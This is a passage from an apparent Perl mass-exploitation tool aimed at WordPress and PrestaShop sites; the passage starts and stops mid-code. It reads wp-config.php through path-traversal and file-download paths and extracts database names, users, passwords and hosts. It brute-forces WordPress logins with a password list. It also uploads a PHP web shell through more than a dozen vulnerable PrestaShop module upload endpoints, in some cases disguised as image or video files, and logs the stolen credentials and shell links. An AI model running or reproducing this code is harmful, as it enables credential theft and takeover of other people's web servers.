wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php','/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php','/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php','/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php','/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php','/wp-config.php.bak','wp-config.php~','wp-config.php_bak','/wp-config.php-bak');
  4451. foreach $pmak(@patik){
  4452. chomp $pmak;
  4453.  
  4454. $url = "$site/$pmak";
  4455. $req = HTTP::Request->new(GET=>$url);
  4456. $userAgent = LWP::UserAgent->new();
  4457. $response = $userAgent->request($req);
  4458. $ar = $response->content;
  4459. if($ar =~ m/DB_NAME/g){
  4460. print color('bold red'),"[";
  4461. print color('bold green'),"+";
  4462. print color('bold red'),"] ";
  4463. print color('bold white'),"Wp LFD Bugs";
  4464. print color('bold white')," ....................... ";
  4465. print color('bold green'),"VULN\n";
  4466. print color('reset');
  4467.     open(save, '>>Result/vulntargets.txt');  
  4468.     print save "[wplfd] $site\n";  
  4469.     close(save);
  4470. $resp = $ua->request(HTTP::Request->new(GET => $url ));
  4471. $cont = $resp->content;
  4472. while($cont =~ m/DB_NAME/g){
  4473.         if ($cont =~ /DB_NAME\', \'(.*)\'\)/){
  4474.         print color("red"),"\t[-]Database Name = $1 \n";
  4475. print color 'reset';
  4476. $db=$1;
  4477.         open (TEXT, '>>Result/databases.txt');
  4478.         print TEXT "\n[ DATABASE ] \n$site\n[-]Database Name = $1";
  4479.         close (TEXT);
  4480.         }
  4481.         if ($cont =~ /DB_USER\', \'(.*)\'\)/){
  4482.         print color("white"),"\t[-]Database User = $1 \n";
  4483. print color 'reset';
  4484. $user=$1;
  4485.         open (TEXT, '>>Result/databases.txt');
  4486.         print TEXT "\n[-]Database User = $1";
  4487.         close (TEXT)
  4488.         }
  4489.         if ($cont =~ /DB_PASSWORD\', \'(.*)\'\)/){
  4490.         print color("red"),"\t[-]Database Password = $1 \n";
  4491. print color 'reset';
  4492. $pass=$1;
  4493.         open (TEXT, '>>Result/databases.txt');
  4494.         print TEXT "\nDatabase Password = $1";
  4495.         close (TEXT)
  4496.         }
  4497.         if ($cont =~ /DB_HOST\', \'(.*)\'\)/){
  4498.         print color("white"),"\t[-]Database Host = $1 \n\n";
  4499.         open (TEXT, '>>Result/databases.txt');
  4500.         print TEXT "\n[-]Database Host = $1";
  4501.         close (TEXT)
  4502. }}
  4503. ###     $input =$site;
  4504. ###
  4505. ###     if ($input =~ m/https:\/\//)
  4506. ###     {
  4507. ###         $source = substr($input,8,length($input));
  4508. ##                        $driver = inet_ntoa(inet_aton($source));
  4509. ##      }
  4510. ##                elsif ($input =~ m/http:\/\//)
  4511. ##                {
  4512. ##                        $source = substr($input,7,length($input));
  4513. ##                        print "Site : $source\n";
  4514. ##                        $driver = inet_ntoa(inet_aton($source));
  4515. ##
  4516. ##                }
  4517. ##      else
  4518. ##      {
  4519. ##          $driver = inet_ntoa(inet_aton($input));
  4520. ##      }
  4521. ##system( "mysql -h $driver -u $user -p $pass");
  4522. ###}
  4523. }else{
  4524. print color('bold red'),"[";
  4525. print color('bold green'),"+";
  4526. print color('bold red'),"] ";
  4527. print color('bold white'),"LFD & Config";
  4528. print color('bold white')," ...................... ";
  4529. print color('bold red'),"Failed\n";
  4530. }
  4531. }
  4532. }
  4533. sub wpbrute{
  4534.  
  4535. print color('bold red'),"[";
  4536. print color('bold green'),"+";
  4537. print color('bold red'),"] ";
  4538. print color('bold white'),"Start brute force";
  4539. print color('bold white')," ................. ";
  4540. print color('bold red'),"WAiTiNG\n";
  4541. $user = $site . '/?author=1';
  4542.  
  4543. $getuser = $ua->get($user)->content;
  4544. if($getuser =~/author\/(.*?)\//){
  4545. $wpuser=$1;
  4546. print "[+] Username: $wpuser\n";
  4547. wpc();
  4548. }
  4549. else {
  4550. print color('bold red'),"[";
  4551. print color('bold green'),"+";
  4552. print color('bold red'),"] ";
  4553. print color('bold white'),"Can't Get Username";
  4554. print color('bold white')," ............... ";
  4555. print color('bold red'),"Failed\n";
  4556. wpcc();
  4557. }
  4558. }
  4559. sub wpc{
  4560. @patsw=('123456','admin123','123','123321','p@ssw0rd','111','hello','1234','admin','demo','12345','112233','Admin','password','root','baglisse','r4j1337');
  4561. foreach $pmasw(@patsw){
  4562. chomp $pmasw;
  4563.  
  4564. $wpz = $site . '/wp-login.php';
  4565. $redirect = $site . '/wp-admin/';
  4566. $wpass = $pmasw;
  4567. print "[-] Trying: $wpass \n";
  4568. $wpbrute = POST $wpz, [log => $wpuser, pwd => $wpass, wp-submit => 'Log In', redirect_to => $redirect];
  4569. $response = $ua->request($wpbrute);
  4570. my $stat = $response->as_string;
  4571.  
  4572. if($stat =~ /Location:/){
  4573. if($stat =~ /wordpress_logged_in/){
  4574.  
  4575. print "- ";
  4576. print color('bold green'),"FOUND\n";
  4577. open (TEXT, '>>Result/wppasscracked.txt');
  4578. print TEXT "$wpz ==> User: $wpuser Pass: $wpass\n";
  4579. close (TEXT);
  4580. print color('reset');
  4581.  
  4582. next OUTER;
  4583. }
  4584. }
  4585. }
  4586. }
  4587.  
  4588. sub wpcc{
  4589. @patsww=('123456','admin123','123','1234','admin','demo','12345','112233','Admin','password','root','baglisse');
  4590. foreach $pmasww(@patsww){
  4591. chomp $pmasww;
  4592. $wpzz = $site . '/wp-login.php';
  4593. $redirect = $site . '/wp-admin/';
  4594. $wpuser = "admin";
  4595. $wpass = $pmasww;
  4596. print "[-] Trying: $wpass \n";
  4597. $wpbrute = POST $wpzz, [log => $wpuser, pwd => $wpass, wp-submit => 'Log In', redirect_to => $redirect];
  4598. $response = $ua->request($wpbrute);
  4599. my $stat = $response->as_string;
  4600.  
  4601. if($stat =~ /Location:/){
  4602. if($stat =~ /wordpress_logged_in/){
  4603.  
  4604. print "- ";
  4605. print color('bold green'),"FOUND\n";
  4606. open (TEXT, '>>Result/wppasscracked.txt');
  4607. print TEXT "$wpzz ==> User: $wpuser Pass: $wpass\n";
  4608. close (TEXT);
  4609. print color('reset');
  4610.  
  4611. next OUTER;
  4612. }
  4613. }
  4614. }
  4615. }
  4616.  
  4617.  
  4618. ######################################################
  4619. #################### PrestaShoP ######################
  4620. ######################################################
  4621.  
  4622. ################ columnadverts #####################
  4623. sub columnadverts(){
  4624. my $url = "$site/modules/columnadverts/uploadimage.php";
  4625. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4626.  
  4627. $columnadvertsup="$site/modules/columnadverts/slides/XAttacker.php?X=Attacker";
  4628.  
  4629. my $checkcolumnadverts = $ua->get("$columnadvertsup")->content;
  4630. if($checkcolumnadverts =~/X Attacker/) {
  4631.  
  4632. print color('bold red'),"[";
  4633. print color('bold green'),"+";
  4634. print color('bold red'),"] ";
  4635. print color('bold white'),"columnadverts";
  4636. print color('bold white')," ..................... ";
  4637. print color('bold green'),"VULN\n";
  4638. print color('bold green')," [";
  4639. print color('bold red'),"+";
  4640. print color('bold green'),"] ";
  4641. print color('bold white'),"Shell Uploaded Successfully\n";
  4642. print color('bold white'),"  [Link] => $columnadvertsup\n";
  4643. open (TEXT, '>>Result/Shells.txt');
  4644. print TEXT "$columnadvertsup\n";
  4645. close (TEXT);
  4646. }else{
  4647. print color('bold red'),"[";
  4648. print color('bold green'),"+";
  4649. print color('bold red'),"] ";
  4650. print color('bold white'),"columnadverts";
  4651. print color('bold white')," ..................... ";
  4652. print color('bold red'),"Failed\n";
  4653. }
  4654. }
  4655.  
  4656.  
  4657. ################ soopamobile #####################
  4658. sub soopamobile(){
  4659. my $url = "$site/modules/soopamobile/uploadimage.php";
  4660. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4661.  
  4662. $soopamobileup="$site/modules/soopamobile/slides/XAttacker.php?X=Attacker";
  4663.  
  4664. my $checksoopamobile = $ua->get("$soopamobileup")->content;
  4665. if($checksoopamobile =~/X Attacker/) {
  4666. print color('bold red'),"[";
  4667. print color('bold green'),"+";
  4668. print color('bold red'),"] ";
  4669. print color('bold white'),"soopamobile";
  4670. print color('bold white')," ....................... ";
  4671. print color('bold green'),"VULN\n";
  4672. print color('bold green')," [";
  4673. print color('bold red'),"+";
  4674. print color('bold green'),"] ";
  4675. print color('bold white'),"Shell Uploaded Successfully\n";
  4676. print color('bold white'),"  [Link] => $soopamobileup\n";
  4677. open (TEXT, '>>Result/Shells.txt');
  4678. print TEXT "$soopamobileup\n";
  4679. close (TEXT);
  4680. }else{
  4681. print color('bold red'),"[";
  4682. print color('bold green'),"+";
  4683. print color('bold red'),"] ";
  4684. print color('bold white'),"soopamobile";
  4685. print color('bold white')," ....................... ";
  4686. print color('bold red'),"Failed\n";
  4687. }
  4688. }
  4689.  
  4690. ################ soopabanners #####################
  4691. sub soopabanners(){
  4692. my $url = "$site/modules/soopabanners/uploadimage.php";
  4693. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4694.  
  4695. $soopabannersup="$site/modules/soopabanners/slides/XAttacker.php?X=Attacker";
  4696.  
  4697. my $checksoopabanners = $ua->get("$soopabannersup")->content;
  4698. if($checksoopabanners =~/X Attacker/) {
  4699.  
  4700. print color('bold red'),"[";
  4701. print color('bold green'),"+";
  4702. print color('bold red'),"] ";
  4703. print color('bold white'),"soopabanners";
  4704. print color('bold white')," ...................... ";
  4705. print color('bold green'),"VULN\n";
  4706. print color('bold green')," [";
  4707. print color('bold red'),"+";
  4708. print color('bold green'),"] ";
  4709. print color('bold white'),"Shell Uploaded Successfully\n";
  4710. print color('bold white'),"  [Link] => $soopabannersup\n";
  4711. open (TEXT, '>>Result/Shells.txt');
  4712. print TEXT "$soopabannersup\n";
  4713. close (TEXT);
  4714. }else{
  4715. print color('bold red'),"[";
  4716. print color('bold green'),"+";
  4717. print color('bold red'),"] ";
  4718. print color('bold white'),"soopabanners";
  4719. print color('bold white')," ...................... ";
  4720. print color('bold red'),"Failed\n";
  4721. }
  4722. }
  4723.  
  4724. ################ vtermslideshow #####################
  4725. sub vtermslideshow(){
  4726. my $url = "$site/modules/vtermslideshow/uploadimage.php";
  4727. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4728.  
  4729. $vtermslideshowup="$site/modules/vtermslideshow/slides/XAttacker.php?X=Attacker";
  4730.  
  4731. my $checkvtermslideshow = $ua->get("$vtermslideshowup")->content;
  4732. if($checkvtermslideshow =~/X Attacker/) {
  4733.  
  4734. print color('bold red'),"[";
  4735. print color('bold green'),"+";
  4736. print color('bold red'),"] ";
  4737. print color('bold white'),"Vtermslideshow";
  4738. print color('bold white')," .................... ";
  4739. print color('bold green'),"VULN\n";
  4740. print color('bold green')," [";
  4741. print color('bold red'),"+";
  4742. print color('bold green'),"] ";
  4743. print color('bold white'),"Shell Uploaded Successfully\n";
  4744. print color('bold white'),"  [Link] => $vtermslideshowup\n";
  4745. open (TEXT, '>>Result/Shells.txt');
  4746. print TEXT "$vtermslideshowup\n";
  4747. close (TEXT);
  4748. }else{
  4749. print color('bold red'),"[";
  4750. print color('bold green'),"+";
  4751. print color('bold red'),"] ";
  4752. print color('bold white'),"Vtermslideshow";
  4753. print color('bold white')," .................... ";
  4754. print color('bold red'),"Failed\n";
  4755. }
  4756. }
  4757.  
  4758. ################ simpleslideshow #####################
  4759. sub simpleslideshow(){
  4760. my $url = "$site/modules/simpleslideshow/uploadimage.php";
  4761. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4762.  
  4763. $simpleslideshowup="$site/modules/simpleslideshow/slides/XAttacker.php?X=Attacker";
  4764.  
  4765. my $checksimpleslideshow = $ua->get("$simpleslideshowup")->content;
  4766. if($checksimpleslideshow =~/X Attacker/) {
  4767.  
  4768. print color('bold red'),"[";
  4769. print color('bold green'),"+";
  4770. print color('bold red'),"] ";
  4771. print color('bold white'),"simpleslideshow";
  4772. print color('bold white')," ................... ";
  4773. print color('bold green'),"VULN\n";
  4774. print color('bold green')," [";
  4775. print color('bold red'),"+";
  4776. print color('bold green'),"] ";
  4777. print color('bold white'),"Shell Uploaded Successfully\n";
  4778. print color('bold white'),"  [Link] => $simpleslideshowup\n";
  4779. open (TEXT, '>>Result/Shells.txt');
  4780. print TEXT "$simpleslideshowup\n";
  4781. close (TEXT);
  4782. }else{
  4783. print color('bold red'),"[";
  4784. print color('bold green'),"+";
  4785. print color('bold red'),"] ";
  4786. print color('bold white'),"simpleslideshow";
  4787. print color('bold white')," ................... ";
  4788. print color('bold red'),"Failed\n";
  4789. }
  4790. }
  4791.  
  4792. ################ productpageadverts #####################
  4793. sub productpageadverts(){
  4794. my $url = "$site/modules/productpageadverts/uploadimage.php";
  4795. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4796.  
  4797. $productpageadvertsup="$site/modules/productpageadverts/slides/XAttacker.php?X=Attacker";
  4798.  
  4799. my $checkproductpageadverts = $ua->get("$productpageadvertsup")->content;
  4800. if($checkproductpageadverts =~/X Attacker/) {
  4801.  
  4802. print color('bold red'),"[";
  4803. print color('bold green'),"+";
  4804. print color('bold red'),"] ";
  4805. print color('bold white'),"productpageadverts";
  4806. print color('bold white')," ................ ";
  4807. print color('bold green'),"VULN\n";
  4808. print color('bold green')," [";
  4809. print color('bold red'),"+";
  4810. print color('bold green'),"] ";
  4811. print color('bold white'),"Shell Uploaded Successfully\n";
  4812. print color('bold white'),"  [Link] => $productpageadvertsup\n";
  4813. open (TEXT, '>>Result/Shells.txt');
  4814. print TEXT "$productpageadvertsup\n";
  4815. close (TEXT);
  4816. }else{
  4817. print color('bold red'),"[";
  4818. print color('bold green'),"+";
  4819. print color('bold red'),"] ";
  4820. print color('bold white'),"productpageadverts";
  4821. print color('bold white')," ................ ";
  4822. print color('bold red'),"Failed\n";
  4823. }
  4824. }
  4825.  
  4826. ################ homepageadvertise #####################
  4827. sub homepageadvertise(){
  4828. my $url = "$site/modules/homepageadvertise/uploadimage.php";
  4829. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4830.  
  4831. $homepageadvertiseup="$site/modules/homepageadvertise/slides/XAttacker.php?X=Attacker";
  4832.  
  4833. my $checkhomepageadvertise = $ua->get("$homepageadvertiseup")->content;
  4834. if($checkhomepageadvertise =~/X Attacker/) {
  4835.  
  4836. print color('bold red'),"[";
  4837. print color('bold green'),"+";
  4838. print color('bold red'),"] ";
  4839. print color('bold white'),"homepageadvertise";
  4840. print color('bold white')," ................. ";
  4841. print color('bold green'),"VULN\n";
  4842. print color('bold green')," [";
  4843. print color('bold red'),"+";
  4844. print color('bold green'),"] ";
  4845. print color('bold white'),"Shell Uploaded Successfully\n";
  4846. print color('bold white'),"  [Link] => $homepageadvertiseup\n";
  4847. open (TEXT, '>>Result/Shells.txt');
  4848. print TEXT "$homepageadvertiseup\n";
  4849. close (TEXT);
  4850. }else{
  4851. print color('bold red'),"[";
  4852. print color('bold green'),"+";
  4853. print color('bold red'),"] ";
  4854. print color('bold white'),"homepageadvertise";
  4855. print color('bold white')," ................. ";
  4856. print color('bold red'),"Failed\n";
  4857. }
  4858. }
  4859.  
  4860. ################ homepageadvertise2 #####################
  4861. sub homepageadvertise2(){
  4862. my $url = "$site/modules/homepageadvertise2/uploadimage.php";
  4863. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4864.  
  4865. $homepageadvertise2up="$site/modules/homepageadvertise2/slides/XAttacker.php?X=Attacker";
  4866.  
  4867. my $checkhomepageadvertise2 = $ua->get("$homepageadvertise2up")->content;
  4868. if($checkhomepageadvertise2 =~/X Attacker/) {
  4869.  
  4870. print color('bold red'),"[";
  4871. print color('bold green'),"+";
  4872. print color('bold red'),"] ";
  4873. print color('bold white'),"homepageadvertise2";
  4874. print color('bold white')," ................ ";
  4875. print color('bold green'),"VULN\n";
  4876. print color('bold green')," [";
  4877. print color('bold red'),"+";
  4878. print color('bold green'),"] ";
  4879. print color('bold white'),"Shell Uploaded Successfully\n";
  4880. print color('bold white'),"  [Link] => $homepageadvertise2up\n";
  4881. open (TEXT, '>>Result/Shells.txt');
  4882. print TEXT "$homepageadvertise2up\n";
  4883. close (TEXT);
  4884. }else{
  4885. print color('bold red'),"[";
  4886. print color('bold green'),"+";
  4887. print color('bold red'),"] ";
  4888. print color('bold white'),"homepageadvertise2";
  4889. print color('bold white')," ................ ";
  4890. print color('bold red'),"Failed\n";
  4891. }
  4892. }
  4893.  
  4894. ################ jro_homepageadvertise #####################
  4895. sub jro_homepageadvertise(){
  4896. my $url = "$site/modules/jro_homepageadvertise/uploadimage.php";
  4897. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4898.  
  4899. $jro_homepageadvertiseup="$site/modules/jro_homepageadvertise/slides/XAttacker.php?X=Attacker";
  4900.  
  4901. my $checkjro_homepageadvertise = $ua->get("$jro_homepageadvertiseup")->content;
  4902. if($checkjro_homepageadvertise =~/X Attacker/) {
  4903.  
  4904. print color('bold red'),"[";
  4905. print color('bold green'),"+";
  4906. print color('bold red'),"] ";
  4907. print color('bold white'),"jro_homepageadvertise";
  4908. print color('bold white')," ............. ";
  4909. print color('bold green'),"VULN\n";
  4910. print color('bold green')," [";
  4911. print color('bold red'),"+";
  4912. print color('bold green'),"] ";
  4913. print color('bold white'),"Shell Uploaded Successfully\n";
  4914. print color('bold white'),"  [Link] => $jro_homepageadvertiseup\n";
  4915. open (TEXT, '>>Result/Shells.txt');
  4916. print TEXT "$jro_homepageadvertiseup\n";
  4917. close (TEXT);
  4918. }else{
  4919. print color('bold red'),"[";
  4920. print color('bold green'),"+";
  4921. print color('bold red'),"] ";
  4922. print color('bold white'),"jro_homepageadvertise";
  4923. print color('bold white')," ............. ";
  4924. print color('bold red'),"Failed\n";
  4925. }
  4926. }
  4927.  
  4928. ################ attributewizardpro #####################
  4929. sub attributewizardpro(){
  4930. my $url = "$site/modules/attributewizardpro/file_upload.php";
  4931. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4932.  
  4933. $attributewizardproup="$site/modules/attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
  4934.  
  4935. my $checkattributewizardpro = $ua->get("$attributewizardproup")->content;
  4936. if($checkattributewizardpro =~/X Attacker/) {
  4937.  
  4938. print color('bold red'),"[";
  4939. print color('bold green'),"+";
  4940. print color('bold red'),"] ";
  4941. print color('bold white'),"attributewizardpro";
  4942. print color('bold white')," ................ ";
  4943. print color('bold green'),"VULN\n";
  4944. print color('bold green')," [";
  4945. print color('bold red'),"+";
  4946. print color('bold green'),"] ";
  4947. print color('bold white'),"Shell Uploaded Successfully\n";
  4948. print color('bold white'),"  [Link] => $attributewizardproup\n";
  4949. open (TEXT, '>>Result/Shells.txt');
  4950. print TEXT "$attributewizardproup\n";
  4951. close (TEXT);
  4952. }else{
  4953. print color('bold red'),"[";
  4954. print color('bold green'),"+";
  4955. print color('bold red'),"] ";
  4956. print color('bold white'),"attributewizardpro";
  4957. print color('bold white')," ................ ";
  4958. print color('bold red'),"Failed\n";
  4959. }
  4960. }
  4961.  
  4962. ################ 1attributewizardpro #####################
  4963. sub oneattributewizardpro(){
  4964. my $url = "$site/modules/1attributewizardpro/file_upload.php";
  4965. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  4966.  
  4967. $oneattributewizardproup="$site/modules/1attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
  4968.  
  4969. my $checkoneattributewizardpro = $ua->get("$oneattributewizardproup")->content;
  4970. if($checkoneattributewizardpro =~/X Attacker/) {
  4971.  
  4972. print color('bold red'),"[";
  4973. print color('bold green'),"+";
  4974. print color('bold red'),"] ";
  4975. print color('bold white'),"1attributewizardpro";
  4976. print color('bold white')," ............... ";
  4977. print color('bold green'),"VULN\n";
  4978. print color('bold green')," [";
  4979. print color('bold red'),"+";
  4980. print color('bold green'),"] ";
  4981. print color('bold white'),"Shell Uploaded Successfully\n";
  4982. print color('bold white'),"  [Link] => $oneattributewizardproup\n";
  4983. open (TEXT, '>>Result/Shells.txt');
  4984. print TEXT "$oneattributewizardproup\n";
  4985. close (TEXT);
  4986. }else{
  4987. print color('bold red'),"[";
  4988. print color('bold green'),"+";
  4989. print color('bold red'),"] ";
  4990. print color('bold white'),"1attributewizardpro";
  4991. print color('bold white')," ............... ";
  4992. print color('bold red'),"Failed\n";
  4993. }
  4994. }
  4995.  
  4996. ################ attributewizardpro.OLD #####################
  4997. sub attributewizardproOLD(){
  4998. my $url = "$site/modules/attributewizardpro.OLD/file_upload.php";
  4999. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  5000.  
  5001. $attributewizardproOLDup="$site/modules/attributewizardpro.OLD/file_uploads/XAttacker.php?X=Attacker";
  5002.  
  5003. my $checkattributewizardproOLD = $ua->get("$attributewizardproOLDup")->content;
  5004. if($checkattributewizardproOLD =~/X Attacker/) {
  5005.  
  5006. print color('bold red'),"[";
  5007. print color('bold green'),"+";
  5008. print color('bold red'),"] ";
  5009. print color('bold white'),"Attributewizardpro.OLD";
  5010. print color('bold white')," ............ ";
  5011. print color('bold green'),"VULN\n";
  5012. print color('bold green')," [";
  5013. print color('bold red'),"+";
  5014. print color('bold green'),"] ";
  5015. print color('bold white'),"Shell Uploaded Successfully\n";
  5016. print color('bold white'),"  [Link] => $attributewizardproOLDup\n";
  5017. open (TEXT, '>>Result/Shells.txt');
  5018. print TEXT "$attributewizardproOLDup\n";
  5019. close (TEXT);
  5020. }else{
  5021. print color('bold red'),"[";
  5022. print color('bold green'),"+";
  5023. print color('bold red'),"] ";
  5024. print color('bold white'),"Attributewizardpro.OLD";
  5025. print color('bold white')," ............ ";
  5026. print color('bold red'),"Failed\n";
  5027. }
  5028. }
  5029.  
  5030.  
  5031. ################ attributewizardpro_x #####################
  5032. sub attributewizardpro_x(){
  5033. my $url = "$site/modules/attributewizardpro_x/file_upload.php";
  5034. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["tool/XAttacker.php"],]);
  5035.  
  5036. $attributewizardpro_xup="$site/modules/attributewizardpro_x/file_uploads/XAttacker.php?X=Attacker";
  5037.  
  5038. my $checkattributewizardpro_x = $ua->get("$attributewizardpro_xup")->content;
  5039. if($checkattributewizardpro_x =~/X Attacker/) {
  5040.  
  5041. print color('bold red'),"[";
  5042. print color('bold green'),"+";
  5043. print color('bold red'),"] ";
  5044. print color('bold white'),"attributewizardpro_x";
  5045. print color('bold white')," .............. ";
  5046. print color('bold green'),"VULN\n";
  5047. print color('bold green')," [";
  5048. print color('bold red'),"+";
  5049. print color('bold green'),"] ";
  5050. print color('bold white'),"Shell Uploaded Successfully\n";
  5051. print color('bold white'),"  [Link] => $attributewizardpro_xup\n";
  5052. open (TEXT, '>>Result/Shells.txt');
  5053. print TEXT "$attributewizardpro_xup\n";
  5054. close (TEXT);
  5055. }else{
  5056. print color('bold red'),"[";
  5057. print color('bold green'),"+";
  5058. print color('bold red'),"] ";
  5059. print color('bold white'),"attributewizardpro_x";
  5060. print color('bold white')," .............. ";
  5061. print color('bold red'),"Failed\n";
  5062. }
  5063. }
  5064.  
  5065. ################ advancedslider #####################
  5066. sub advancedslider(){
  5067. my $url = "$site/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php";
  5068. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["tool/XAttacker.php.png"],]);
  5069.  
  5070. $advancedsliderup="$site/modules/advancedslider/uploads/XAttacker.php.png?X=Attacker";
  5071.  
  5072. my $checkadvancedslider = $ua->get("$advancedsliderup")->content;
  5073. if($checkadvancedslider =~/X Attacker/) {
  5074.  
  5075. print color('bold red'),"[";
  5076. print color('bold green'),"+";
  5077. print color('bold red'),"] ";
  5078. print color('bold white'),"advancedslider";
  5079. print color('bold white')," .................... ";
  5080. print color('bold green'),"VULN\n";
  5081. print color('bold green')," [";
  5082. print color('bold red'),"+";
  5083. print color('bold green'),"] ";
  5084. print color('bold white'),"Shell Uploaded Successfully\n";
  5085. print color('bold white'),"  [Link] => $advancedsliderup\n";
  5086. open (TEXT, '>>Result/Shells.txt');
  5087. print TEXT "$advancedsliderup\n";
  5088. close (TEXT);
  5089. }else{
  5090. print color('bold red'),"[";
  5091. print color('bold green'),"+";
  5092. print color('bold red'),"] ";
  5093. print color('bold white'),"advancedslider";
  5094. print color('bold white')," .................... ";
  5095. print color('bold red'),"Failed\n";
  5096. }
  5097. }
  5098.  
  5099. ################ cartabandonmentpro #####################
  5100. sub cartabandonmentpro(){
  5101. my $url = "$site/modules/cartabandonmentpro/upload.php";
  5102. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["tool/XAttacker.php.png"],]);
  5103.  
  5104. $cartabandonmentproup="$site/modules/cartabandonmentpro/uploads/XAttacker.php.png?X=Attacker";
  5105.  
  5106. my $checkcartabandonmentpro = $ua->get("$cartabandonmentproup")->content;
  5107. if($checkcartabandonmentpro =~/X Attacker/) {
  5108.  
  5109. print color('bold red'),"[";
  5110. print color('bold green'),"+";
  5111. print color('bold red'),"] ";
  5112. print color('bold white'),"cartabandonmentpro";
  5113. print color('bold white')," ................ ";
  5114. print color('bold green'),"VULN\n";
  5115. print color('bold green')," [";
  5116. print color('bold red'),"+";
  5117. print color('bold green'),"] ";
  5118. print color('bold white'),"Shell Uploaded Successfully\n";
  5119. print color('bold white'),"  [Link] => $cartabandonmentproup\n";
  5120. open (TEXT, '>>Result/Shells.txt');
  5121. print TEXT "$cartabandonmentproup\n";
  5122. close (TEXT);
  5123. }else{
  5124. print color('bold red'),"[";
  5125. print color('bold green'),"+";
  5126. print color('bold red'),"] ";
  5127. print color('bold white'),"cartabandonmentpro";
  5128. print color('bold white')," ................ ";
  5129. print color('bold red'),"Failed\n";
  5130. }
  5131. }
  5132.  
  5133. ################ cartabandonmentproOld #####################
  5134. sub cartabandonmentproOld(){
  5135. my $url = "$site/modules/cartabandonmentproOld/upload.php";
  5136. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["tool/XAttacker.php.png"],]);
  5137.  
  5138. $cartabandonmentproOldup="$site/modules/cartabandonmentproOld/uploads/XAttacker.php.png?X=Attacker";
  5139.  
  5140. my $checkcartabandonmentproOld = $ua->get("$cartabandonmentproOldup")->content;
  5141. if($checkcartabandonmentproOld =~/X Attacker/) {
  5142.  
  5143. print color('bold red'),"[";
  5144. print color('bold green'),"+";
  5145. print color('bold red'),"] ";
  5146. print color('bold white'),"cartabandonmentproOld";
  5147. print color('bold white')," ............. ";
  5148. print color('bold green'),"VULN\n";
  5149. print color('bold green')," [";
  5150. print color('bold red'),"+";
  5151. print color('bold green'),"] ";
  5152. print color('bold white'),"Shell Uploaded Successfully\n";
  5153. print color('bold white'),"  [Link] => $cartabandonmentproOldup\n";
  5154. open (TEXT, '>>Result/Shells.txt');
  5155. print TEXT "$cartabandonmentproOldup\n";
  5156. close (TEXT);
  5157. }else{
  5158. print color('bold red'),"[";
  5159. print color('bold green'),"+";
  5160. print color('bold red'),"] ";
  5161. print color('bold white'),"cartabandonmentproOld";
  5162. print color('bold white')," ............. ";
  5163. print color('bold red'),"Failed\n";
  5164. }
  5165. }
  5166.  
  5167. ################ videostab #####################
  5168. sub videostab(){
  5169. my $url = "$site/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload";
  5170. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["tool/XAttacker.php.mp4"],]);
  5171.  
  5172. $videostabup="$site/modules/videostab/uploads/XAttacker.php.mp4?X=Attacker";
  5173.  
  5174. my $checkvideostab = $ua->get("$videostabup")->content;
  5175. if($checkvideostab =~/X Attacker/) {
  5176.  
  5177. print color('bold red'),"[";
  5178. print color('bold green'),"+";
  5179. print color('bold red'),"] ";
  5180. print color('bold white'),"videostab";
  5181. print color('bold white')," ......................... ";
  5182. print color('bold green'),"VULN\n";
  5183. print color('bold green')," [";
  5184. print color('bold red'),"+";
  5185. print color('bold green'),"] ";
  5186. print color('bold white'),"Shell Uploaded Successfully\n";
  5187. print color('bold white'),"  [Link] => $videostabup\n";
  5188. open (TEXT, '>>Result/Shells.txt');
  5189. print TEXT "$videostabup\n";
  5190. close (TEXT);
  5191. }else{
  5192. print color('bold red'),"[";
  5193. print color('bold green'),"+";
  5194. print color('bold red'),"] ";
  5195. print color('bold white'),"videostab";
  5196. print color('bold white')," ......................... ";
  5197. print color('bold red'),"Failed\n";
  5198. }
  5199. }
  5200.  
  5201. ################ wg24themeadministration #####################
  5202. sub wg24themeadministration(){
  5203. my $url = "$site/modules//wg24themeadministration/wg24_ajax.php";
  5204. my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'pattern_upload', Content => [bajatax => ["tool/XAttacker.php"],]);
  5205.  
  5206. $wg24themeadministrationup="$site/modules//wg24themeadministration///img/upload/XAttacker.php?X=Attacker";
  5207.  
  5208. my $checkwg24themeadministration = $ua->get("$wg24themeadministrationup")->content;
  5209. if($checkwg24themeadministration =~/X Attacker/) {
  5210.  
  5211. print color('bold red'),"[";
  5212. print color('bold green'),"+";
  5213. print color('bold red'),"] ";
